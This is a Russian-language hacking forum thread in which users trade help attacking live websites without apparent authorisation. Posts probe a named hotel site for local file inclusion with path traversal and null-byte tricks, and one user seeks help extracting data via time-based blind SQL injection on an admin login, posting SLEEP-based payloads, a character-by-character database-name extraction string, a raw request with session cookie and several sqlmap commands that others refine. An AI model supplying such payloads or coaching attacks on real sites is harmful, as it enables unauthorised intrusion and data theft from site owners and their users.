Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    работает, там другая проблема
     
  2. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    неа, не работает
    я проверил подключив admin/index.php%00 - не подключился
    admin/index - подключает
    ---------
    в сообщении об ошибке вроде бы видно что да null отработал, но по факту не подключает, хз
    в чем там может быть проблема?
     
    _________________________
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Точно .
     
  4. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    У меня даже admin/index - не подключает
     
  5. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    потому что ../admin/index
    php/ лишняя директория
     
    _________________________
  6. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    джино хостинг кстати, у них какая то интересная настройка не то пых не то апач, пых наверно
     
    _________________________
  7. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    Подскажите Blind SQL Injection на https://site.com/admin/login/ через post username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27&password=&login=Login Havij через https не работает Sqlmap не находит inj
    да и не сильна я в нём( Может есть ещё какие нибудь проги для автоматизации,смогла только названии базы вытащить и всё((
     
  8. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    sqlmap находит, просто надо быть поприветливей с ним, он не проходимец)
     
    _________________________
  9. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    Вот я и говорю мож не те параметры задаю((

    POST /admin/login/ HTTP/1.1
    Cache-Control: no-cache
    Referer: https://site.com/admin/login/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
    Accept-Language: en-us,en;q=0.5
    Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634
    Host: site.com
    Accept-Encoding: gzip, deflate
    Content-Length: 80
    Content-Type: application/x-www-form-urlencoded

    username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27&password=&login=Login

    sqlmap.py -u https://site.com/admin/login/ --data=username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27&password=&login=Login --cookie=PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634 --random-agent

    что тогда здесь не так?
     
  10. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    мде
    для начала
    Code:
    sqlmap.py -u https://site.com/admin/login/  --data="username=ololo&password=&login=Login" --cookie="PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634" --random-agent -v 3 -p username --dbs
    
     
    _________________________
  11. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    POST parameter 'username' is not injectable((
     
  12. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    --prefix="'+" --suffix="+'" --technique=T
     
    _________________________
  13. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    Всё равно ничего не находит((
     
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    задавай параметры пустые
     
  15. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    в смысле логин и пароль ,уже пыталась

    '+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+'

    вот таким перебором вытащила имя базы

    но вот sqlmap никак нехочет найти ihj
     
  16. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Должен sqlmap -u site.com/login/ --form пробуйте
     
  17. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    --forms тоже нет((
     
  18. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    sqlmap умеет загружать куки сам?может в этом проблема
     
  19. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    А если нуль-байт экранируется (%00) то он должен в ошибке выглядеть так (\0.php) а если его нет в ошибке то он обрезает расширение?
    Просто есть еще сайт одной популярной игры,там аналогичная ситуация как и с сайтом http://hotel-stalingrad.ru/index.php?page=cafe там так же инклудятся локальные файлы как и c этим сайтом
    Code:
    hotel-stalingrad.ru/index.php?page=../admin/index
    На сайте игры стоит php 5.4.45 apache 2.2.2
    Перечитал уже все сайты о php include так и ничего кроме нуль-байта и [4096] слешей не нашел.
    Но я так понял что [4096] слешей не работают с php версией 5.4.45
     
    #1559 nik1201, 7 Dec 2016
    Last edited: 7 Dec 2016
  20. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Ну не откинешь ты .php с этого и надо было начинать